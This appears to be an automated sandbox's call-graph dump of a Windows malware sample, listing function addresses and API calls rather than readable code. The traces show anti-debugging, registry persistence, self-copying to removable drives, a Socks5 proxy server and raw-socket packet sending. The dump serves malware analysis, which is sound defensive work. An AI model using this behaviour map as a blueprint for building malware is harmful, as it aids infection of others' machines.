405a73 5505->5506 5507 405ab8 RegOpenKeyExA 5506->5507 5508 405af3 RegQueryValueExA 5507->5508 5509 405c1e 5507->5509 5508->5509 5510 405b3a RegCloseKey 5508->5510 5510->5509 5511 405b58 lstrlen 5510->5511 5512 405b80 lstrlen 5511->5512 5513 405b6d lstrlen 5511->5513 5514 405b9b lstrcat 5512->5514 5515 405bae 5512->5515 5513->5512 5514->5515 5519 404eae GetTickCount srand rand 5515->5519 5517 405bcb lstrcpy lstrcat CopyFileA 5517->5509 5517->5515 5518->5504 5519->5517 4801 1000b670 4802 1000b82b 4801->4802 4804 1000b67b 4801->4804 4802->4802 4803 1000b7f7 VirtualProtect VirtualProtect 4803->4802 4804->4803 4805 1000b7c0 4804->4805 6283 10001170 6284 100031f0 6283->6284 6285 10003206 6284->6285 6286 1000320e FindAtomA 6284->6286 6287 100032b1 malloc 6286->6287 6288 100033ec 6286->6288 6289 10003420 abort 6287->6289 6290 100032c7 AddAtomA 6287->6290 6298 10003150 GetAtomNameA 6288->6298 6294 10003411 6290->6294 6295 100033cf 6290->6295 6292 100033f1 6296 10003150 4 API calls 6294->6296 6295->6292 6297 100033d5 ??3@YAXPAX FindAtomA 6295->6297 6296->6295 6297->6288 6299 10003186 6298->6299 6300 100031a0 6299->6300 6302 10003430 fprintf fflush abort 6299->6302 6300->6292 6303 40a330 6304 409230 ??3@YAXPAX 6303->6304 6305 40a347 6304->6305 6306 402936 lstrcat 6319 404eae GetTickCount srand rand 6306->6319 6308 40295e lstrcat 6320 404eae GetTickCount srand rand 6308->6320 6310 402986 lstrcat 6321 404eae GetTickCount srand rand 6310->6321 6312 4029ae lstrcat 6313 402ecd 6312->6313 6314 404f0a 3 API calls 6313->6314 6315 402ed6 6313->6315 6316 402ebe Sleep 6313->6316 6314->6313 6317 405ee8 128 API calls 6315->6317 6316->6313 6318 402f1d 6317->6318 6319->6308 6320->6310 6321->6312 4819 10002278 rot13 RegOpenKeyExA 4820 10002323 lstrlen RegSetValueExA RegCloseKey 4819->4820 4821 100022cd RegCreateKeyExA 4819->4821 4822 10002376 4820->4822 4821->4820 4821->4822 6322 1000157e GetTempPathA GetTempFileNameA CreateFileA 6323 10001616 6322->6323 6327 10001620 6322->6327 6324 100017b4 closesocket 6323->6324 6325 100017c6 DeleteFileA 6324->6325 6326 100017d7 6324->6326 6325->6326 6328 10001675 CloseHandle memset wsprintfA CreateProcessA 6327->6328 6329 1000164e WriteFile 6327->6329 6328->6324 6330 10001758 WaitForSingleObject CloseHandle CloseHandle DeleteFileA closesocket 6328->6330 6329->6327 6330->6326 4830 1000237f rot13 add_system_direcroty rot13 rot13 RegOpenKeyExA 4831 10002416 RegOpenKeyExA 4830->4831 4832 10002447 lstrlen RegSetValueExA RegCloseKey 4830->4832 4831->4832 4833 1000249d 4831->4833 4832->4833 5520 40a4c0 5521 40a4f8 5520->5521 5523 40a4d3 5520->5523 5522 40a3d0 66 API calls 5521->5522 5522->5523 5524 40b460 18 API calls 5523->5524 5527 40a7c8 5524->5527 5525 40a820 ??3@YAXPAX 5526 40a82b 5525->5526 5529 40b540 15 API calls 5526->5529 5527->5525 5528 40a7ed 5527->5528 5531 40c080 3 API calls 5527->5531 5528->5526 5532 40c0e0 2 API calls 5528->5532 5530 40a836 5529->5530 5531->5528 5533 40a81a 5532->5533 5533->5525 5533->5526 6331 40b9c0 6332 40ba20 6331->6332 6333 40b9db 6331->6333 6334 40b0e0 10 API calls 6332->6334 6335 40b3b0 4 API calls 6333->6335 6338 40b9e2 6333->6338 6334->6333 6335->6338 6336 40ba60 GetLastError TlsGetValue SetLastError 6337 40b9e9 6336->6337 6339 40ba11 6337->6339 6340 40babc 6337->6340 6342 40b0e0 10 API calls 6337->6342 6338->6336 6338->6337 6341 40bac3 TlsSetValue 6340->6341 6344 40b3b0 4 API calls 6340->6344 6345 40baf5 GetLastError 6341->6345 6342->6340 6344->6341 6345->6341 6346 10001180 CreateThread 6347 40bfc0 GetLastError TlsGetValue SetLastError 5534 10003089 5535 10003090 5534->5535 5538 10001110 __dllonexit 5535->5538 5537 100030c6 5538->5537 5539 4092c9 5540 4092d0 5539->5540 5541 40b540 15 API calls 5540->5541 5542 4092db 5541->5542 6348 4029c9 lstrcat 6359 404eae GetTickCount srand rand 6348->6359 6350 4029f1 lstrcat 6360 404eae GetTickCount srand rand 6350->6360 6352 402a19 lstrcat lstrcat lstrcat 6353 402ecd 6352->6353 6354 404f0a 3 API calls 6353->6354 6355 402ed6 6353->6355 6356 402ebe Sleep 6353->6356 6354->6353 6357 405ee8 128 API calls 6355->6357 6356->6353 6358 402f1d 6357->6358 6359->6350 6360->6352 6361 409fc9 6362 409fd0 6361->6362 6363 409f00 strcmp 6362->6363 6366 409fff 6363->6366 6364 40a119 6365 4094a0 strcmp 6365->6366 6366->6364 6366->6365 5543 10001c8c Socks5Accept 5544 10001db9 closesocket 5543->5544 5545 10001cbb Socks5GetCmd 5543->5545 5546 10001dc9 5544->5546 5545->5544 5547 10001ced Socks5CmdIsSupported 5545->5547 5547->5544 5548 10001d1a Socks5ServConnect 5547->5548 5548->5544 5549 10001d46 Socks5SendCode 5548->5549 5550 10001da8 closesocket 5549->5550 5551 10001d6c CreateConnectStruct create_thread SocksPipe 5549->5551 5550->5544 5551->5546 6367 409fd0 6368 409f00 strcmp 6367->6368 6371 409fff 6368->6371 6369 40a119 6370 4094a0 strcmp 6370->6371 6371->6369 6371->6370 4500 40b0e0 4501 40b0f6 4500->4501 4502 40b0fe FindAtomA 4500->4502 4503 40b1a1 malloc 4502->4503 4504 40b2dc 4502->4504 4505 40b310 abort 4503->4505 4506 40b1b7 AddAtomA 4503->4506 4514 40b040 GetAtomNameA 4504->4514 4510 40b301 4506->4510 4511 40b2bf 4506->4511 4508 40b2e1 4512 40b040 4 API calls 4510->4512 4511->4508 4513 40b2c5 ??3@YAXPAX FindAtomA 4511->4513 4512->4511 4513->4504 4515 40b076 4514->4515 4516 40b090 4515->4516 4518 40c130 fprintf fflush abort 4515->4518 4516->4508 5552 4012e0 5553 40b0e0 5552->5553 5554 40b0f6 5553->5554 5555 40b0fe FindAtomA 5553->5555 5556 40b1a1 malloc 5555->5556 5557 40b2dc 5555->5557 5558 40b310 abort 5556->5558 5559 40b1b7 AddAtomA 5556->5559 5560 40b040 4 API calls 5557->5560 5563 40b301 5559->5563 5564 40b2bf 5559->5564 5561 40b2e1 5560->5561 5565 40b040 4 API calls 5563->5565 5564->5561 5566 40b2c5 ??3@YAXPAX FindAtomA 5564->5566 5565->5564 5566->5557 5567 403ae0 5568 403b01 5567->5568 5569 404620 5 API calls 5568->5569 5570 403b1b 5569->5570 5571 404620 5 API calls 5570->5571 5572 403b45 5571->5572 5590 40829c CreateFileA 5572->5590 5574 403c33 5575 403b59 5575->5574 5576 404620 5 API calls 5575->5576 5577 403b96 5576->5577 5578 40829c 24 API calls 5577->5578 5580 403bb0 5578->5580 5579 404f0a 3 API calls 5579->5580 5580->5574 5580->5579 5581 403bd3 5580->5581 5582 403bbb Sleep 5580->5582 5603 40396e RegOpenKeyExA 5581->5603 5582->5580 5586 403bdd 5587 404812 4 API calls 5586->5587 5588 403c15 5587->5588 5589 4048e2 4 API calls 5588->5589 5589->5574 5591 408300 CreateFileA 5590->5591 5592 40869e 5590->5592 5593 408353 CloseHandle 5591->5593 5594 408368 5591->5594 5592->5575 5593->5592 5614 40814c GetSystemTime 5594->5614 5598 4083f8 8 API calls 5599 4084fe ReadFile 5598->5599 5600 408535 5599->5600 5601 408577 7 API calls 5599->5601 5600->5601 5602 40853e WriteFile 5600->5602 5601->5592 5602->5599 5604 4039b1 memset RegQueryValueExA RegCloseKey 5603->5604 5605 403a32 5603->5605 5604->5605 5606 403a2a 5604->5606 5608 403a38 memset 5605->5608 5620 403390 CreateFileA 5606->5620 5609 403a8b 5608->5609 5610 403a9a GetDriveTypeA 5609->5610 5612 403ad8 5609->5612 5610->5609 5611 403aaa Sleep 5610->5611 5638 403790 5611->5638 5612->5586 5615 40816e 5614->5615 5616 4081d8 SetFilePointer 5615->5616 5617 408215 ReadFile 5616->5617 5618 40824c 5617->5618 5619 40826f SetFilePointer 5617->5619 5618->5617 5618->5619 5619->5598 5621 403618 5620->5621 5622 4033f8 GetFileSize CreateFileMappingA 5620->5622 5621->5605 5623 403480 MapViewOfFile 5622->5623 5624 403465 CloseHandle 5622->5624 5625 4034b7 CloseHandle CloseHandle 5623->5625 5631 4034e3 5623->5631 5624->5621 5625->5621 5626 403502 memset 5626->5631 5627 4035e6 UnmapViewOfFile CloseHandle CloseHandle 5627->5621 5628 404f0a 3 API calls 5628->5631 5629 40356b Sleep 5629->5631 5631->5626 5631->5627 5631->5628 5631->5629 5632 403595 CreateThread 5631->5632 5633 4035ca Sleep 5631->5633 5634 403008 5631->5634 5632->5633 5633->5631 5636 40303a 5634->5636 5637 403022 5634->5637 5635 403027 strstr 5635->5636 5635->5637 5636->5631 5637->5635 5637->5636 5639 40395f 5638->5639 5640 4037b7 5638->5640 5639->5609 5640->5639 5641 4037c8 _mbscpy 5640->5641 5642 403806 memset 5641->5642 5643 4037f7 5641->5643 5646 403845 5642->5646 5643->5642 5644 403849 FindFirstFileA 5644->5639 5644->5646 5645 40387b FindNextFileA 5645->5646 5647 403950 5645->5647 5646->5644 5646->5645 5648 4038bc lstrcpy 5646->5648 5650 4038fd _mbscat 5646->5650 5651 403790 39 API calls 5646->5651 5653 403622 5646->5653 5647->5639 5649 403954 FindClose 5647->5649 5648->5646 5648->5650 5649->5639 5650->5646 5651->5646 5654 403644 5653->5654 5655 403670 lstrcpyn CharLowerA 5654->5655 5656 403667 5654->5656 5657 40369c lstrcmp 5655->5657 5656->5657 5658 4036c2 lstrcmp 5657->5658 5659 403767 5657->5659 5658->5659 5661 4036dd lstrcmp 5658->5661 5670 402f2e CreateFileA 5659->5670 5661->5659 5663 4036f4 lstrcmp 5661->5663 5663->5659 5665 40370b lstrcmp 5663->5665 5664 403788 5664->5646 5665->5659 5666 403722 lstrcmp 5665->5666 5666->5659 5668 403739 lstrcmp 5666->5668 5668->5659 5669 403750 lstrcmp 5668->5669 5669->5659 5669->5664 5671 402fba 5670->5671 5672 402f8d GetFileSize 5670->5672 5671->5664 5675 40307e fopen 5671->5675 5673 402fa7 5672->5673 5674 402fab CloseHandle 5672->5674 5673->5674 5674->5671 5676 403388 5675->5676 5677 4030bb fgetc 5675->5677 5676->5664 5679 4030d0 fclose fopen 5677->5679 5679->5676 5689 4030fa 5679->5689 5680 403360 fgetc 5681 40337b fclose 5680->5681 5680->5689 5681->5676 5682 403115 ftell 5683 403127 fseek fgetc 5682->5683 5682->5689 5683->5689 5684 40314b fseek fgetc 5686 40316f fclose 5684->5686 5684->5689 5685 4030ff rewind 5685->5689 5686->5689 5687 403224 fgetc 5687->5689 5688 40324f lstrlen 5688->5680 5688->5689 5689->5680 5689->5681 5689->5682 5689->5683 5689->5684 5689->5685 5689->5687 5689->5688 5690 403008 strstr 5689->5690 5693 404f0a 3 API calls 5689->5693 5694 4032d6 Sleep 5689->5694 5695 4032ee CreateThread Sleep 5689->5695 5697 402fc2 lstrcmp 5689->5697 5700 40305a strchr 5689->5700 5690->5689 5693->5689 5694->5689 5695->5689 5696 403341 Sleep 5695->5696 5696->5689 5698 403000 5697->5698 5699 402fe8 lstrcpy 5697->5699 5698->5689 5699->5698 5700->5689 6376 40a5e0 6379 40c040 CreateSemaphoreA 6376->6379 6378 40a5f2 6379->6378 6380 40bde0 6381 40be59 6380->6381 6383 40bdf8 6380->6383 6382 40b0e0 10 API calls 6381->6382 6382->6383 6384 40bdff 6383->6384 6385 40b3b0 4 API calls 6383->6385 6386 40be7b GetLastError TlsGetValue SetLastError 6384->6386 6387 40be06 6384->6387 6385->6384 6386->6387 5701 4028e2 lstrcat lstrcat lstrcat 5702 402ecd 5701->5702 5703 404f0a 3 API calls 5702->5703 5704 402ed6 5702->5704 5705 402ebe Sleep 5702->5705 5703->5702 5706 405ee8 128 API calls 5704->5706 5705->5702 5707 402f1d 5706->5707 5708 100024a2 6 API calls 5709 10002539 5708->5709 5710 1000252d rand 5708->5710 5711 10002546 GetTickCount srand rand 5709->5711 5712 1000255f 5709->5712 5710->5709 5711->5712 5713 10002587 5712->5713 5714 1000256e GetTickCount srand rand 5712->5714 5715 10002596 GetTickCount srand rand 5713->5715 5716 100025af 5713->5716 5714->5713 5715->5716 5717 100025d7 5716->5717 5718 100025be GetTickCount srand rand 5716->5718 5719 100025e6 GetTickCount srand rand 5717->5719 5720 100025ff 7 API calls 5717->5720 5718->5717 5719->5720 6392 406bea inet_addr WSASocketA 6393 406c92 setsockopt 6392->6393 6402 406d01 6392->6402 6394 406ccd GetProcessHeap RtlAllocateHeap 6393->6394 6393->6402 6395 406cff memset GetCurrentProcessId 6394->6395 6394->6402 6397 406d52 GetTickCount Sleep 6395->6397 6398 406d9e GetTickCount 6395->6398 6397->6397 6397->6398 6403 406ba4 6398->6403 6401 406e00 Sleep 6401->6398 6404 406bb7 sendto 6403->6404 6404->6401 6404->6402 5721 4092ec 5722 40930b 5721->5722 5723 4092fc 5721->5723 5725 40931f 5722->5725 5726 4090a0 66 API calls 5722->5726 5724 40bb20 26 API calls 5723->5724 5724->5722 5727 40a600 66 API calls 5725->5727 5726->5725 5728 40932b 5727->5728 5729 40a510 66 API calls 5728->5729 5730 409352 5729->5730 5731 40aaee 5732 40aaf0 5731->5732 5733 4090a0 66 API calls 5732->5733 5743 40aa1e 5733->5743 5734 40aa66 5735 40b540 15 API calls 5734->5735 5736 40aa7b 5735->5736 5737 40aa34 TlsGetValue SetLastError 5737->5734 5738 40ab53 malloc 5737->5738 5739 40ab66 TlsSetValue 5738->5739 5738->5743 5740 40abba GetLastError 5739->5740 5739->5743 5740->5743 5741 40a430 66 API calls 5741->5743 5742 40a8b0 2 API calls 5742->5743 5743->5734 5743->5737 5743->5741 5743->5742 4806 436cf0 4807 436d00 4806->4807 4808 436e3a VirtualProtect VirtualProtect 4807->4808 4809 436dfe LoadLibraryA 4807->4809 4811 436e6e 4808->4811 4810 436e15 4809->4810 4810->4807 4812 436e1c GetProcAddress 4810->4812 4811->4811 4812->4810 4813 436e34 ExitProcess 4812->4813 5744 4094f9 5745 409500 5744->5745 5746 4094a0 strcmp 5745->5746 5747 409518 5746->5747 5752 40a6fc 5753 40a700 5752->5753 5754 40bed0 2 API calls 5753->5754 5755 40a71c 5754->5755 5756 40c080 3 API calls 5755->5756 5757 40a699 5755->5757 5756->5757 5758 40a64e memset 5757->5758 5759 40c0e0 2 API calls 5757->5759 5760 40a430 66 API calls 5757->5760 5761 40b540 15 API calls 5758->5761 5759->5757 5760->5757 5762 40a67c 5761->5762 6409 100011bd GlobalAlloc 5763 4098fe 5764 409900 5763->5764 5765 4094a0 strcmp 5764->5765 5766 4098cd 5765->5766 5767 4094a0 strcmp 5766->5767 5768 4098dc 5766->5768 5767->5768 6410 10001bbe sread 6411 10001bf8 6410->6411 6412 10001c7d 6410->6412 6411->6412 6413 10001c12 sread 6411->6413 6413->6412 6414 10001c2e swrite 6413->6414 6414->6412 6416 10001c6f Socks5Auth 6414->6416 6416->6412 4519 401280 __set_app_type 4524 401150 SetUnhandledExceptionFilter 4519->4524 4521 401298 __set_app_type 4522 401150 185 API calls 4521->4522 4523 4012b8 4522->4523 4525 40116b 4524->4525 4526 401170 __getmainargs 4525->4526 4527 401210 __p__fmode 4526->4527 4528 4011ac 4526->4528 4531 401222 4527->4531 4529 401260 _setmode 4528->4529 4530 4011bf 4528->4530 4529->4530 4532 4011e3 4530->4532 4533 4011c4 _setmode 4530->4533 4535 40122a __p__environ 4531->4535 4532->4527 4534 4011e8 _setmode 4532->4534 4533->4532 4534->4527 4538 404076 4535->4538 4539 40408f 4538->4539 4540 404094 WSAStartup 4539->4540 4610 404ab8 IsDebuggerPresent 4540->4610 4543 4040c2 4612 4049ea 4543->4612 4544 4040b6 ExitProcess 4547 4040d7 4618 404620 memset GetSystemDirectoryA lstrlen 4547->4618 4548 4040cb ExitProcess 4550 40410d 4551 404620 5 API calls 4550->4551 4552 40413d 4551->4552 4621 403f24 4552->4621 4557 404150 4635 405dc4 4557->4635 4558 4041c5 4700 403e2e 4558->4700 4562 4041ca 4564 40124b _cexit ExitProcess 4562->4564 4703 404ed6 fopen 4562->4703 4570 4041e9 4574 405dc4 58 API calls 4570->4574 4571 40423e 4572 404242 LoadLibraryA 4571->4572 4579 404253 4571->4579 4572->4579 4576 4041ee 4574->4576 4578 405d46 4 API calls 4576->4578 4581 4041f6 4578->4581 4706 404812 RegOpenKeyExA 4579->4706 4583 403c44 39 API calls 4581->4583 4586 4041fb 4583->4586 4589 4056d0 55 API calls 4586->4589 4588 4041ab 4696 405776 memset CreateProcessA 4588->4696 4592 404200 4589->4592 4590 404296 CreateThread 4591 4042cf 4590->4591 4710 404df4 GetCurrentProcess OpenProcessToken 4591->4710 4595 4054f2 42 API calls 4592->4595 4596 404208 4595->4596 4599 40435c 6 API calls 4596->4599 4601 40421a LoadLibraryA Sleep 4599->4601 4600 4042ef 4602 4042f3 LoadLibraryA 4600->4602 4603 404304 4600->4603 4601->4564 4602->4603 4604 404812 4 API calls 4603->4604 4605 40432c 4604->4605 4606 40433c 4605->4606 4718 406a0a CreateThread 4605->4718 4719 407c4e 4606->4719 4609 404341 Sleep 4609->4609 4611 4040b2 4610->4611 4611->4543 4611->4544 4613 404a65 4612->4613 4615 4040c7 4613->4615 4616 404a88 CharLowerA 4613->4616 4728 404748 RegOpenKeyExA 4613->4728 4615->4547 4615->4548 4732 404990 4616->4732 4619 404663 lstrcat 4618->4619 4620 404676 lstrcat 4618->4620 4619->4620 4620->4550 4736 404c38 4621->4736 4623 403f48 RegOpenKeyExA 4624 403f79 RegCreateKeyExA 4623->4624 4625 403fcf lstrlen RegSetValueExA RegCloseKey 4623->4625 4624->4625 4626 404022 4624->4626 4625->4626 4627 403d26 4626->4627 4629 403d46 4627->4629 4628 403d48 RegOpenKeyExA 4628->4629 4630 403d87 RegCloseKey 4628->4630 4629->4628 4632 403da9 4629->4632 4631 403e24 4630->4631 4631->4557 4631->4558 4632->4631 4633 403dab RegCreateKeyExA 4632->4633 4633->4632 4634 403e0c RegCloseKey 4633->4634 4634->4632 4636 405de5 4635->4636 4637 404620 5 API calls 4636->4637 4638 405dff 4637->4638 4639 405e2b CreateFileA 4638->4639 4640 405e83 4639->4640 4641 405e77 ExitProcess 4639->4641 4738 405c6c 4640->4738 4644 4054f2 42 API calls 4645 405eb4 4644->4645 4646 404620 5 API calls 4645->4646 4647 405ed2 4646->4647 4648 40435c 6 API calls 4647->4648 4649 404155 4648->4649 4650 405d46 CreateFileA 4649->4650 4651 405d9c 4650->4651 4652 40415d 4650->4652 4653 405c6c 2 API calls 4651->4653 4655 403c44 4652->4655 4654 405db4 CloseHandle 4653->4654 4654->4652 4656 403c6c 4655->4656 4744 404f82 6 API calls 4656->4744 4660 403ca0 4764 4048e2 RegOpenKeyExA 4660->4764 4662 403cc4 4663 4048e2 4 API calls 4662->4663 4664 403ce8 4663->4664 4665 404690 5 API calls 4664->4665 4666 403d00 4665->4666 4667 404690 5 API calls 4666->4667 4668 403d18 4667->4668 4669 4056d0 GetModuleFileNameA 4668->4669 4670 405712 4669->4670 4671 404620 5 API calls 4670->4671 4672 40572c CopyFileA 4671->4672 4673 4054f2 42 API calls 4672->4673 4674 40574b 4673->4674 4675 404620 5 API calls 4674->4675 4676 405763 4675->4676 4677 40435c 6 API calls 4676->4677 4678 404167 4677->4678 4679 4054f2 CreateFileA 4678->4679 4680 40416f 4679->4680 4681 40554e 4679->4681 4690 40435c CreateFileA 4680->4690 4682 404f82 30 API calls 4681->4682 4683 405559 SetFilePointer WriteFile Sleep 4682->4683 4684 404f82 30 API calls 4683->4684 4685 4055b9 SetFilePointer WriteFile Sleep 4684->4685 4686 404f82 30 API calls 4685->4686 4687 405619 SetFilePointer WriteFile SetFilePointer 4686->4687 4688 40568d WriteFile 4687->4688 4688->4688 4689 4056bd CloseHandle 4688->4689 4689->4680 4691 404181 LoadLibraryA Sleep 4690->4691 4692 4043bb GetFileTime 4690->4692 4691->4588 4692->4691 4693 4043e2 CloseHandle CreateFileA 4692->4693 4693->4691 4694 404441 SetFileTime 4693->4694 4694->4691 4695 404464 CloseHandle 4694->4695 4695->4691 4697 405841 4696->4697 4698 405809 4696->4698 4697->4564 4698->4697 4699 40580f WaitForSingleObject CloseHandle CloseHandle 4698->4699 4699->4697 4701 404c38 4700->4701 4702 403e48 CreateMutexA GetLastError 4701->4702 4702->4562 4704 4041e5 4703->4704 4705 404ef8 fclose 4703->4705 4704->4570 4704->4571 4705->4704 4707 404858 RegOpenKeyExA 4706->4707 4708 40488b RegQueryValueExA RegCloseKey 4706->4708 4707->4708 4709 40428b 4707->4709 4708->4709 4709->4590 4709->4591 4711 404e21 LookupPrivilegeValueA 4710->4711 4712 4042db Sleep 4710->4712 4713 404e42 AdjustTokenPrivileges 4711->4713 4714 404e98 CloseHandle 4711->4714 4715 40402c 4712->4715 4713->4712 4714->4712 4716 404c38 4715->4716 4717 404046 CreateMutexA GetLastError 4716->4717 4717->4600 4718->4606 4720 407cc7 4719->4720 4768 404ce6 4720->4768 4724 401c2c 47 API calls 4725 407e39 4724->4725 4725->4724 4726 408013 CreateThread 4725->4726 4772 402120 4725->4772 4789 404eae GetTickCount srand rand 4725->4789 4726->4609 4729 4047c0 RegQueryValueExA RegCloseKey 4728->4729 4730 40478d RegOpenKeyExA 4728->4730 4731 40480a 4729->4731 4730->4729 4730->4731 4731->4613 4733 4049bc strstr 4732->4733 4734 4049d0 4733->4734 4735 4049d7 4733->4735 4734->4613 4735->4733 4735->4734 4737 404c4b 4736->4737 4737->4623 4739 405c90 4738->4739 4740 405d0b 4738->4740 4739->4740 4741 405c98 WriteFile 4739->4741 4742 405d3d CloseHandle 4740->4742 4743 405d0f WriteFile 4740->4743 4741->4739 4742->4644 4743->4742 4745 405019 4744->4745 4746 40500d rand 4744->4746 4747 405026 GetTickCount srand rand 4745->4747 4748 40503f 4745->4748 4746->4745 4747->4748 4749 405067 4748->4749 4750 40504e GetTickCount srand rand 4748->4750 4751 405076 GetTickCount srand rand 4749->4751 4752 40508f 4749->4752 4750->4749 4751->4752 4753 4050b7 4752->4753 4754 40509e GetTickCount srand rand 4752->4754 4755 4050c6 GetTickCount srand rand 4753->4755 4756 4050df 6 API calls 4753->4756 4754->4753 4755->4756 4757 4051c0 rand rand 4756->4757 4758 40522a 4757->4758 4758->4757 4759 403c90 4758->4759 4760 404690 RegOpenKeyExA 4759->4760 4761 4046fa lstrlen RegSetValueExA RegCloseKey 4760->4761 4762 4046cc RegOpenKeyExA 4760->4762 4763 404741 4761->4763 4762->4761 4762->4763 4763->4660 4765 404948 RegSetValueExA RegCloseKey 4764->4765 4766 40491a RegOpenKeyExA 4764->4766 4767 40498a 4765->4767 4766->4765 4766->4767 4767->4662 4769 404d06 4768->4769 4770 404812 4 API calls 4769->4770 4771 404d16 GetLocalTime 4770->4771 4771->4725 4773 402170 4772->4773 4773->4773 4774 4021c0 _mbscat 4773->4774 4775 4021d6 4773->4775 4776 402280 4774->4776 4777 4021f2 4775->4777 4778 4021dc _mbscat 4775->4778 4776->4725 4779 4021f8 _mbscat 4777->4779 4780 40220b 4777->4780 4778->4776 4779->4776 4781 402211 _mbscat 4780->4781 4782 402224 4780->4782 4781->4776 4783 40222a _mbscat 4782->4783 4784 40223d 4782->4784 4783->4776 4785 402243 _mbscat 4784->4785 4786 402256 4784->4786 4785->4776 4787 40225c _mbscat 4786->4787 4788 40226f _mbscat 4786->4788 4787->4776 4788->4776 4789->4725 5769 402288 lstrlen 5770 4022ba memset lstrcpy 5769->5770 5824 402f1d 5769->5824 5771 4022fd 5770->5771 5772 404620 5 API calls 5771->5772 5773 402317 5772->5773 5827 404eae GetTickCount srand rand 5773->5827 5775 402323 5828 404eae GetTickCount srand rand 5775->5828 5777 402331 5778 402362 7 API calls 5777->5778 5779 40233f Sleep 5777->5779 5830 404eae GetTickCount srand rand 5778->5830 5829 404eae GetTickCount srand rand 5779->5829 5782 402431 strstr 5783 40244d 5782->5783 5786 402459 5782->5786 5831 404eae GetTickCount srand rand 5783->5831 5785 404f0a 3 API calls 5799 402ecd 5785->5799 5787 402542 lstrcat 5786->5787 5788 402753 lstrcat lstrcat 5786->5788 5789 4025a5 lstrcat 5786->5789 5790 402608 lstrcat 5786->5790 5791 4027d8 lstrcat lstrcat 5786->5791 5792 40266b lstrcat 5786->5792 5793 40246e lstrcat 5786->5793 5794 4026ce lstrcat lstrcat 5786->5794 5795 4024df lstrcat lstrcat 5786->5795 5786->5799 5835 404eae GetTickCount srand rand 5787->5835 5841 404eae GetTickCount srand rand 5788->5841 5836 404eae GetTickCount srand rand 5789->5836 5837 404eae GetTickCount srand rand 5790->5837 5843 404eae GetTickCount srand rand 5791->5843 5838 404eae GetTickCount srand rand 5792->5838 5832 404eae GetTickCount srand rand 5793->5832 5839 404eae GetTickCount srand rand 5794->5839 5834 404eae GetTickCount srand rand 5795->5834 5799->5785 5810 402ed6 5799->5810 5811 402ebe Sleep 5799->5811 5806 402693 lstrcat lstrcat 5806->5799 5807 402710 lstrcat 5840 404eae GetTickCount srand rand 5807->5840 5808 402521 lstrcat 5808->5799 5809 40256a lstrcat lstrcat 5809->5799 5819 405ee8 128 API calls 5810->5819 5811->5799 5812 402795 lstrcat 5842 404eae GetTickCount srand rand 5812->5842 5813 4025cd lstrcat lstrcat 5813->5799 5814 402630 lstrcat lstrcat 5814->5799 5815 40281a lstrcat 5844 404eae GetTickCount srand rand 5815->5844 5816 402496 lstrcat 5833 404eae GetTickCount srand rand 5816->5833 5819->5824 5822 4024be lstrcat 5822->5799 5823 402738 lstrcat 5823->5799 5825 4027bd lstrcat 5825->5799 5826 402842 lstrcat 5826->5799 5827->5775 5828->5777 5829->5777 5830->5782 5831->5786 5832->5816 5833->5822 5834->5808 5835->5809 5836->5813 5837->5814 5838->5806 5839->5807 5840->5823 5841->5812 5842->5825 5843->5815 5844->5826 6417 40bf89 6418 40bf90 TlsFree 6417->6418 6419 40bfb0 GetLastError 6418->6419 6420 40bfab 6418->6420 5845 40a68c 5846 40a690 5845->5846 5847 40bed0 2 API calls 5846->5847 5849 40a699 5846->5849 5848 40a71c 5847->5848 5848->5849 5854 40c080 3 API calls 5848->5854 5850 40a64e memset 5849->5850 5851 40c0e0 2 API calls 5849->5851 5852 40a430 66 API calls 5849->5852 5853 40b540 15 API calls 5850->5853 5851->5849 5852->5849 5855 40a67c 5853->5855 5854->5849 5856 40aa8c 5857 40aaf0 5856->5857 5858 40aa9c 5856->5858 5859 4090a0 66 API calls 5857->5859 5860 40bb20 26 API calls 5858->5860 5870 40aa1e 5859->5870 5861 40aaab 5860->5861 5862 40ab0a InterlockedIncrement 5861->5862 5861->5870 5862->5870 5863 40aa66 5864 40b540 15 API calls 5863->5864 5865 40aa7b 5864->5865 5866 40a8b0 2 API calls 5866->5870 5867 40aa34 TlsGetValue SetLastError 5867->5863 5868 40ab53 malloc 5867->5868 5869 40ab66 TlsSetValue 5868->5869 5868->5870 5869->5870 5871 40abba GetLastError 5869->5871 5870->5863 5870->5866 5870->5867 5872 40a430 66 API calls 5870->5872 5871->5870 5872->5870 6421 40bf90 TlsFree 6422 40bfb0 GetLastError 6421->6422 6423 40bfab 6421->6423 6428 100011db _malloc 6429 100017df sread 6430 10001818 6429->6430 6442 10001823 6429->6442 6431 10001898 sread 6430->6431 6432 1000183f 6430->6432 6430->6442 6435 100018bc 6431->6435 6431->6442 6433 10001844 6432->6433 6434 1000184e 6432->6434 6436 10001872 sread 6433->6436 6433->6442 6437 100019a1 sread 6434->6437 6438 10001857 6434->6438 6439 100018cb sread 6435->6439 6435->6442 6436->6442 6444 10001893 sread 6436->6444 6441 100019c0 sread 6437->6441 6437->6442 6438->6442 6443 10001860 socks5_exec 6438->6443 6440 100018ec gethostbyname 6439->6440 6439->6442 6440->6444 6445 1000190d sread 6440->6445 6441->6442 6446 100019db swrite 6441->6446 6443->6442 6444->6442 6445->6442 6448 10001931 swrite 6445->6448 6446->6442 6449 100019f6 swrite 6446->6449 6448->6442 6450 1000195a swrite 6448->6450 6449->6442 6451 10001a0e swrite 6449->6451 6450->6442 6452 10001972 swrite 6450->6452 6451->6442 6452->6442 5912 4068a0 memcpy 5913 4068e0 5912->5913 5914 404620 5 API calls 5913->5914 5915 406910 5914->5915 5916 404ed6 2 API calls 5915->5916 5921 406918 5916->5921 5917 4069fb 5918 406926 Sleep 5919 40693a GetDriveTypeA 5918->5919 5920 406955 memset _mbscat lstrlen 5919->5920 5919->5921 5922 40699b lstrcat 5920->5922 5923 4069ae _mbscat SetErrorMode CopyFileA 5920->5923 5921->5917 5921->5918 5921->5919 5922->5923 5923->5921 5924 100012e4 5926 100012f2 5924->5926 5925 1000134b 5928 1000137e shutdown shutdown closesocket closesocket 5925->5928 5929 10001356 5925->5929 5926->5925 5927 10001329 swrite 5926->5927 5926->5929 5927->5926 5927->5929 5930 100013f4 GlobalFree 5928->5930 5931 100013da Sleep 5928->5931 5930->5929 5931->5930 5931->5931 6468 40a9a6 6469 40a9c1 6468->6469 6470 40a9b2 6468->6470 6472 40a9d0 6469->6472 6473 4090a0 66 API calls 6469->6473 6471 40bb20 26 API calls 6470->6471 6471->6469 6474 40b460 18 API calls 6472->6474 6473->6472 6478 40aa08 6474->6478 6475 40aa66 6476 40b540 15 API calls 6475->6476 6477 40aa7b 6476->6477 6478->6475 6480 40ab0a InterlockedIncrement 6478->6480 6484 40aa1e 6478->6484 6479 40aa34 TlsGetValue SetLastError 6479->6475 